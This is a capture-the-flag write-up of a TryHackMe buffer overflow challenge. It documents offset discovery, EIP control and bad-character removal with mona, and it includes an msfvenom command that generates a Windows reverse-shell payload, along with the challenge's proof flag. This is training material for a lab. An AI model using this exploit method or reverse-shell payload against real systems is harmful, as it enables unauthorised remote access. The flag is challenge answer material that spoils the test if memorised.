Professional Documents
Culture Documents
Buffer Overflow Challenge: Testing Organization
Buffer Overflow Challenge: Testing Organization
Challenge
Tester’s Name
pavanmsvs
TryHackme ID
noobsyntax
Test Date
03/07/2021
Our purpose of this testing was to find vulnerability in the given application and using the vulnerability gain user
access.
Nmap used to check at which port the application is running. Msfvenom to create payload metasploit-
framework tool to find offset value, pattern-creation.
Page 2
From nmap scan we can see that there is only 2 port open and at port 31337 and 8888 our application is
running. We are already provided with a skeleton of the code we have to use that skeleton and modify it to gain
user access. From other port at bin directory we got the vulnerable application, downloaded it and transferred
it to our testing machine where we will test our code and try to gain user access
Page 3
We can download the vulnerable application and start testing in our windows machine
EXPLOITING THE TARGET
Now will start our testing in local development system by using the skeleton.
Page 4
Used the skeleton just modified the IP as shown with that of my local testing system. Opened the application in
the testing system with immunity debugger where we will watch the application details and how our code
affects the application
Page 5
As we can see that the application is running now will try our crash code by simply executing it in our attacking
system
As the application crashed from 500 “A” sent to it will create a pattern of that and will try crash attack once
more with our pattern to get the offset value
For this will have to use metasploit tool pattern_create.rb this script will create a random char pattern of the
length specified by us. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500 -l --> length of
the pattern now will put this pattern character in place of “A” in our skeleton code
Now we created the code with our pattern of 500 length and will execute this to get the offset value (exact
crash point of the application).
Page 6
After executing our code we see that we got EIP value which will use to find the offset of the application, and at
ESP address we can see our pattern is seen. For finding the offset we will use another metasploit tool
pattern_offset.rb this will give the application offset value
As seen above using the EIP value we found the offset of the application which is 146.. Now will use this value in
our code to control the EIP
Page 7
Will use the skeleton with the offset value in it and pass “B” extra character to get EIP control.
As seen at EIP we got our extra passed character’s ASCII value i.e. 42424242. AS we have controlled the EIP will
now find the bad character in the application. For this will use the built in Mona module of immunity debugger.
Will configure a log folder first and then will create a byte array using Mona module.
Page 8
!mona config -set workingfolder c:\logs\%p --> to configure log folder
Page 9
Once we created the bad character using mona will copy this in our code and execute it.
We can simply add this as bad and add to buffer or we can pass it as buff value after the given value of skeleton.
Once we execute our code we will get the bad character present in the application which we have to remove
Page 10
Page 11
!mona bytearray -b “\x00”
Similarly will remove the bad character from our code as well and will execute to see if any other bad character
present in our code
Page 12
We can see that it saying corruption after 0 bytes will remove that character from the bytearray and again
execute the code. To remove the bad character form log will use mona command.
Similarly will remove the bad character from our code as well and will execute to see if any other bad character
present in our code.
Page 13
Page 14
Now we are set to create our payload using msfvenom to gain user control and get the shell access of the
testing system
Page 15
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.8 lport=4444 -b "\x00\x0a" -f python
Copying this buff value in our code and changing it as per the skeleton provided, and adding the ESP value and
NOPs padding. Padding = "\x90" * 16
Page 16
Page 17
On executing our shell code got the local system shell thus we successfully created a shell code which gave the
local system access now will create payload for the THM machine as we are connected with VPN will use tun0 ip
in payload and change the target IP in our code
Page 18
Page 19
Proof flag: - 40E44BACF8B1464C8882D08160F6EF4A4FCC4676
We successfully got user access of the system and got the flag, Submitted the flag in THM
Page 20